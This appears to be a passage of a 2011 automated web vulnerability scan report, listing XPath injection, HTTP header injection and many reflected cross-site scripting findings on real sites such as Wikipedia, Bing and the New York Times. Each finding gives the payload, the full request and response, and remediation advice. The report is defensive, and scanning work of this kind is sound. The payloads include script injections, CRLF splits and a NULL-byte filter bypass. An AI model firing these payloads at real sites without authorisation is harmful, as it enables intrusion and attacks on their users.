<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<m
...[SNIP]...

3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /jcarousel'/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:23 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
<a href='http://sorgalla.com/tag/xpath/' class='tag-link-26' title='1 Thema' style='font-size: 8pt;'>
...[SNIP]...

4. HTTP header injection  previous  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://18.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8f669%0d%0a0e49f1068d4 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=134&camp=8206&affcode=kw20564&inhURL=&cid=6850998613&networkType=search&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225548374%3B49327377%3Bv%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc110298/8f669%0d%0a0e49f1068d4/x22 HTTP/1.1
Host: 18.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:15:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0c7def07-120f-fd49-cb9f-00001824d995; expires=Mon, 01-Aug-2011 13:15:13 GMT; path=/; domain=.xg4ken.com
Location: http://ad.doubleclick.net/clk;225548374;49327377;v?https://www.ally.com/index.html?CP=ppc110298/8f669
0e49f1068d4
/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


4.2. http://ad.uk.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bfed0%0d%0aff541864603 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bfed0%0d%0aff541864603;src=1197321;type=barcl676;cat=acces951;ord=1;num=4100466468371.4507? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://apps.barclays.co.uk/accessibility/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/bfed0
ff541864603
;src=1197321;type=barcl676;cat=acces951;ord=1;num=4100466468371.4507:
Date: Tue, 03 May 2011 10:22:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://topics.nytimes.com/top/news/business/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 88682%0d%0a12518bf15fb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/88682%0d%0a12518bf15fb/business/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:24 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/88682
12518bf15fb
/business/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

4.4. http://topics.nytimes.com/top/news/business/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ce975%0d%0a9d5ccac3422 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/ce975%0d%0a9d5ccac3422/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:25 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/ce975
9d5ccac3422
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

5. Cross-site scripting (reflected)  previous  next
There are 172 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 9c261<img%20src%3da%20onerror%3dalert(1)>928548c3ce7 was submitted in the q parameter. This input was echoed as 9c261<img src=a onerror=alert(1)>928548c3ce7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=9c261<img%20src%3da%20onerror%3dalert(1)>928548c3ce7 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=banking+thailand&go=&form=QBLH&qs=n&sk=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=A5ECB6861B6147E494B4E63F96A0AFF8&CW=1043&CH=903&bIm=529

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 0e61084fc4fc4301ba28fec5e52577bc
Date: Tue, 03 May 2011 13:14:26 GMT
Connection: close

{"AS":{"Query":"9c261<img src=a onerror=alert(1)>928548c3ce7","FullResults":1}}

5.2. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bits.wikimedia.org
Path:   /en.wikipedia.org/load.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 706e8<script>alert(1)</script>4b7a05ba12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en.wikipedia.org/load.php706e8<script>alert(1)</script>4b7a05ba12?debug=false&lang=en&modules=site&only=styles&skin=vector HTTP/1.1
Host: bits.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12wm1
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/load.php706e8<script>alert(1)</script>4b7a05ba12?debug=false&lang=en&modules=site&only=styles&skin=vector
Content-Type: text/html; charset=utf-8
Content-Length: 5760
Date: Tue, 03 May 2011 11:44:30 GMT
X-Varnish: 1814098367
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/load.php706e8&lt;scrip
...[SNIP]...
<p style="font-weight: bold;">To check for "load.php706e8<script>alert(1)</script>4b7a05ba12?debug=false&lang=en&modules=site&only=styles&skin=vector" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/load.php706e8<script>
...[SNIP]...

5.3. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bits.wikimedia.org
Path:   /en.wikipedia.org/load.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d914f"><script>alert(1)</script>36c1e35431d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en.wikipedia.org/load.phpd914f"><script>alert(1)</script>36c1e35431d?debug=false&lang=en&modules=site&only=styles&skin=vector HTTP/1.1
Host: bits.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12wm1
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/load.phpd914f"><script>alert(1)</script>36c1e35431d?debug=false&lang=en&modules=site&only=styles&skin=vector
Content-Type: text/html; charset=utf-8
Content-Length: 5794
Date: Tue, 03 May 2011 11:44:29 GMT
X-Varnish: 1814097658
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/load.phpd914f&quot;&gt
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/load.phpd914f"><script>alert(1)</script>36c1e35431d?debug=false&lang=en&modules=site&only=styles&skin=vector" title="Wikipedia:load.phpd914f">
...[SNIP]...

5.4. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /wiki/Liste_der_Banken_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0058e56"><script>alert(1)</script>9a9eef19ccb was submitted in the REST URL parameter 2. This input was echoed as 58e56"><script>alert(1)</script>9a9eef19ccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Liste_der_Banken_in_Thailand%0058e56"><script>alert(1)</script>9a9eef19ccb HTTP/1.1
Host: de.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:20:18 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=de.wikipedia.org loc=/wiki/Liste_der_Banken_in_Thailand%0058e56"><script>alert(1)</script>9a9eef19ccb
Content-Length: 5564
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:3128
X-Cache: MISS from sq77.wikimedia.org
X-Cache-Lookup: MISS from sq77.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://de.wikipedia.org/wiki/Liste_der_Banken_in
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Liste_der_Banken_in_Thailand%0058e56"><script>alert(1)</script>9a9eef19ccb" title="Wikipedia:Liste_der_Banken_in_Thailand%0058e56">
...[SNIP]...

5.5. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /wiki/Liste_der_Banken_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00c5794<script>alert(1)</script>bb4f084c467 was submitted in the REST URL parameter 2. This input was echoed as c5794<script>alert(1)</script>bb4f084c467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Liste_der_Banken_in_Thailand%00c5794<script>alert(1)</script>bb4f084c467 HTTP/1.1
Host: de.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:20:25 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=de.wikipedia.org loc=/wiki/Liste_der_Banken_in_Thailand%00c5794<script>alert(1)</script>bb4f084c467
Content-Length: 5536
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:3128
X-Cache: MISS from sq39.wikimedia.org
X-Cache-Lookup: MISS from sq39.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://de.wikipedia.org/wiki/Liste_der_Banken_in
...[SNIP]...
<p style="font-weight: bold;">To check for "Liste_der_Banken_in_Thailand%00c5794<script>alert(1)</script>bb4f084c467" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Liste_der_Banken_in_Thailand%00c5794<script>
...[SNIP]...

5.6. http://ds.addthis.com/red/psi/sites/marketdata.set.or.th/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/marketdata.set.or.th/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8084c<script>alert(1)</script>1d5476c394a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/marketdata.set.or.th/p.json?callback=_ate.ad.hpr8084c<script>alert(1)</script>1d5476c394a&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fmarketdata.set.or.th%2Fmkt%2Ftopten.do%3Flanguage%3Den%26country%3DUS&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Fsitemap%2Ffor_listing.html&d8del7 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1304431085.1FE|1304431085.1OD|1304431085.60

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 14:06:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 14:06:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 14:06:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 14:06:49 GMT
Connection: close

_ate.ad.hpr8084c<script>alert(1)</script>1d5476c394a({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.7. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.set.or.th/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 34fe0<script>alert(1)</script>b7028b6fd8d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.set.or.th/p.json?callback=_ate.ad.hpr34fe0<script>alert(1)</script>b7028b6fd8d&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.set.or.th%2Fen%2Fregulations%2Fcg%2Froles_p1.html&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&zu5tb1 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 473
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 13:58:06 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 01 Aug 2011 13:58:06 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 13:58:06 GMT; Path=/
Set-Cookie: di=%7B%7D..1304431086.1FE|1304431086.1OD|1304431086.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 02:39:07 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 13:58:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:58:06 GMT
Connection: close

_ate.ad.hpr34fe0<script>alert(1)</script>b7028b6fd8d({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

5.8. http://edge.aperture.displaymarketplace.com/displayscript.js [PageID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /displayscript.js

Issue detail

The value of the PageID request parameter is copied into the HTML document as plain text between tags. The payload 4a5ea<script>alert(1)</script>b28d747a326 was submitted in the PageID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=274a5ea<script>alert(1)</script>b28d747a326 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 14932
Expires: Tue, 03 May 2011 13:33:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:33:02 GMT
Connection: close
Set-Cookie: mpackc=v1^1016|1234|2175; domain=displaymarketplace.com; expires=Fri, 03-May-2013 13:32:59 GMT; path=/

if (liveCon_ClientID === undefined)// && datran_ClientID === undefined)
{
   var liveCon_ClientID = 4157529279552;
}

//-----------------Helper Methods----------------------

function liveCon_Get
...[SNIP]...
com/pagead/conversion/1045272592/?label=qj0kCNDh2gEQkLC28gM&amp;guid=ON&amp;script=0");
liveCon_LoadImage("http://aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&pageID=274a5ea<script>alert(1)</script>b28d747a326&eventType=view");
liveCon_LoadImage("http://edge.aperture.displaymarketplace.com/exl.gif?initdb=1");
liveCon_LoadImage("http://adadvisor.net/adscores/s.pixel?sid=9110517187&_md5=&_fromss=0&code=");
...[SNIP]...

5.9. http://en.wikipedia.org/w/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006a3ca"><a>09100c96293 was submitted in the REST URL parameter 1. This input was echoed as 6a3ca"><a>09100c96293 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /w%006a3ca"><a>09100c96293/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response (redirected)

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:05 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/w%006a3ca"><a>09100c96293/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript
Content-Length: 5784
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:3128
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
